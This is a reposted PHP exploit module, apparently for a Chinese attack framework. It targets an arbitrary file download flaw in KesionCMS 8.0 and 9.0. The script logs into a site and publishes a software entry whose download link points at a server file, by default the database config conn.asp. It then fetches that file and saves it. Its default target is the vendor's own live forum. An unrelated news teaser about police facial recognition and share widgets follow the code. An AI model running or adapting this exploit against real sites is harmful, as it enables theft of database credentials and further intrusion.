array( //info 数组定义模块相关信息
'author'=>'鬼哥', //作者信息
'title'=>'kesionCMS >=8.0 9.0 任意下载漏洞', //模块名称
'info'=>'https://forum.90sec.org/thread-3874-1-1.html' //模块简介
),
'option'=>array( //模块参数信息设置
'host'=>'bbs.kesion.com', //host初始化值127.0.0.1
'path'=>'/',
'port'=>'80',
'xiafile'=>'conn.asp',
'user'=>'tttttt',
'pass'=>'tttttt',
'classid'=>'自动获取'
)
);
return $info;
}
public function tjwj($classids,$coo)
{
$data=HTTP::GET(G('host'),G('path').'user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID='.$classids.'&Title=aaniu&DownUrls=/'.G('xiafile'),$coo,'');
if(strpos($data,'Action=Add&ClassID=')!== false)
{
$this->tjwj2($coo);
}
elseif(strpos($data,'系统设定不能在此栏目发表')!== false)
{
msg('classid='.$classids.' 错误,请手动到/plus/rss.asp获取',1);
}
else
{
msg('soft publish fail',1);
}
}
public function tjwj2($coo)
{
$data=HTTP::GET(G('host'),G('path').'user/User_ItemInfo.asp?ChannelID=3',$coo,'');
if(strpos($data,'value=')!== false)
{
preg_match('/value="(.+?)"/', $data, $arr);
$this->tjwj3($arr[1]);
}
else
{
msg('Get Download address error',1);
}
}
public function tjwj3($id)
{
$data=HTTP::GET(G('host'),G('path').'item/downLoad.asp?m=3&downid=1&id='.$id,'','http://'.G('host').G('path'));
$james=fopen(G('xiafile'),"w");
fwrite($james,$data);
fclose($james);
msg(G('xiafile') . ': successfully downloaded',1);
$htmlfile=G('xiafile');
if(file_exists($htmlfile)){
system("start ".$htmlfile);
}
}
public function tjwj4($classids)
{
$data=HTTP::GET(G('host'),G('path').'user/CheckUserLogin.asp?Username='.G('user').'&Password='.G('pass'),'','');
if(strpos($data,'RndPassword=')!== false)
{
preg_match('/Set-Cookie: (.*)/', $data, $arr);
$str=$arr[1];
$order = array("rn", "n", "r");
$replace = '';
$str=str_replace($order, $replace, $str);
$this->tjwj($classids,$str);
}
else
{
msg('user '.G('user').' login fail',1);
}
}
public function run(){ //模块运行函数 msg("HOST => ".G('host'),1); //
if(G('classid')=='自动获取')
{
$data=HTTP::GET(G('host'),G('path').'plus/rss.asp','','');
if(strpos($data,'?classid=')!== false)
{
preg_match('/classid=(.+?)&/', $data, $arr);
//$result=explode("=",$arr[1]);
$this->tjwj4($arr[1]);
}
else
{
msg('Get classid fail',1);
}
}
else
{
$this->tjwj4(G('classid'));
}
}
}
?>
文章来源于lcx.cc:科讯任意文件下载 exploit for wve
相关推荐: 武汉公安开发尖端人像识别系统 可瞬间辨认嫌疑人 全国摄像头寻人
新华网武汉11月12日电(记者冯国栋)记者在武汉市公安局视频监控运维中心采访时获悉,武汉公安正构建一套高精准人像识别系统,建成后能在1秒钟内比对1亿次图像,瞬间可辨认嫌疑人。 记者了解到,这套系统主要通过安装在城市道路路口、两侧以及公交车上的25万个视频探头进…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论